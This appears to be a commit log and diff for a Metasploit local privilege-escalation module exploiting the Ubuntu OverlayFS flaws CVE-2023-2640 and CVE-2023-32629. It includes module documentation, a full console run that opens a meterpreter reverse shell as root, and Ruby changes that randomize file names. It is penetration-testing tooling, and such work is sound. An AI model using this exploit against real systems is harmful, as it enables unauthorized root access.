Remove unneeded file and rudocop corrections

Update modules/exploits/linux/local/gameoverlay_privesc.rb

Co-authored-by: Brendan <[email protected]>

Give bwatters7 credit, add docs

Experiment with randomized bash copy and Rex::File.join

remove unused line

Add missing parenthesis

fix problem with bash copy

Remove rex::join, call proper method for generating payload

add exploit::exe mixin, bash copy randomization

Rubocop changes

Remove nc

Author: gardnerapp

documentation/modules/exploit/linux/local/gameoverlay_privesc.md

@@ -0,0 +1,148 @@
+## Description
+
+CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of 
+capabilities while overlaying filesystems. On most Linux Kernels during the execution of
+ `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a
+way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel
+ `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. 
+
+When a new namespace is created the user will technically be "root" within that given 
+namespace. This module will take advantage of this by setting the 	`CAP_SETUID` capability 
+on a system binary. It will then perform filesystem overlay, copying the binary into the lower
+directory. Because of the flaws described above when the binary is transfered into the upper
+directory it's capabilities will not be sanitized and persist in the "normal" namespace. 
+
+## Vunerable Application
+
+These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
+and kernel versions, as described in the list below. 
+
+Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629)
+
+Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629)
+
+The user can download a vunerable version, for example:
+
+```
+sudo apt update
+sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
+reboot
+```
+While testing @bwatters7 mentioned taking the system Be sure to take the system offline to 
+prevent the vunerabilities from silently being patched. 
+
+This module has succesfully been tested on the following:
+
+Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic
+
+Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws
+
+## Verification Steps
+
+1). Start `msfconsole`
+
+2). Get a session on a vunerable system
+
+3). Use `exploit/linux/local/gameoverlay_privesc`
+
+4). Optional: choose target for payload, either system command (1) or payload (2) 
+`set target 1`
+
+5). Set session `set session [SESSION]`
+
+5). Do. `run`
+
+6). You should get a new session running as root. 
+
+## Options
+
+### Payload File Name
+Name of the file storing the payload, default is `marv`.
+
+### Writable Dir
+The name of a directory with write permissions, defualt is `/tmp`. This will be where the 
+payload file will be created. Additionally during the exploit a series of directories will be
+created here to perform the filesystem overlaying. 
+
+## Scenarios
+
+You have a non-root session on one of the systems described above. Please note that this 
+module will automatically run checks to determine if the system is vunerable, you can disable 
+this with `set AutoCheck False`. 
+
+```
+ > use exploit/linux/local/gameoverlay_privesc 
+[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/gameoverlay_privesc) > set session 1
+session => 1
+msf6 exploit(linux/local/gameoverlay_privesc) > set target 0
+target => 0
+msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp
+payload => linux/aarch64/meterpreter_reverse_tcp
+msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201
+lhost => 10.5.135.201
+msf6 exploit(linux/local/gameoverlay_privesc) > show options
+
+Module options (exploit/linux/local/gameoverlay_privesc):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   PayloadFileName  pVmtuGOGXdO      yes       Name of payload
+   SESSION          1                yes       The session to run this module on
+   WritableDir      /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/aarch64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux_Binary
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/gameoverlay_privesc) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Ubuntu version: Jammy Jellyfish
+[*] Detected kernel version: 5.19.0-41-generic
+[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
+[*] Creating directory /tmp/UqNFkc/
+[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/
+[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/
+[*] Creating directory /tmp/UqNFkc/uKmqunqY/
+[*] Creating directory /tmp/UqNFkc/pwFUmC/
+[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO
+[*] Starting new namespace, and running exploit...
+[+] Deleted /tmp/UqNFkc/
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500
+[*] 
+
+meterpreter > sysinfo
+Computer     : 10.5.132.149
+OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```

modules/exploits/linux/local/gameoverlay_privesc.rb

@@ -5,6 +5,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(
@@ -25,6 +26,7 @@ def initialize(info = {})
         'Author' => [
           'g1vi', # PoC
           'h00die', # Module Suggestion
+          'bwatters-r7', # MsF Module
           'gardnerapp', # MsF Module
         ],
         'Platform' => ['linux'],
@@ -43,7 +45,7 @@ def initialize(info = {})
           [
             'Linux_Binary',
             {
-              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Arch' => [ ARCH_AARCH64, ARCH_X64 ],
               'PrependSetuid' => true
             }
           ],
@@ -116,28 +118,31 @@ def check
   end
 
   def exploit
-    datastore['PayloadFilename']
     pay_dir = datastore['WritableDir']
     pay_dir += '/' unless pay_dir.ends_with? '/'
-    pay_dir += Rex::Text.rand_text_alpha 10
-    pay_dir += '/' unless pay_dir.ends_with? '/'
+
+    pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + '/'
+
     print_status "Creating directory to store payload: #{pay_dir}"
     mkdir pay_dir
-    pay_dir = datastore['WritableDir']
-    pay_dir << '/' unless pay_dir.ends_with? '/'
-    pay_dir += Rex::Text.rand_text_alpha(rand(6..13))
-    pay_dir << '/'
+
     directories = []
     directories << pay_dir
+
     lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << lower_dir
+
     upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << upper_dir
+
     work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << work_dir
+
     merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
     directories << merge_dir
-    bash_copy = '/var/tmp/bash'
+
+    bash_copy = '/var/tmp/' + Rex::Text.rand_text_alpha(rand(6..13))
+    # bash_copy = '/var/tmp/bash'
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"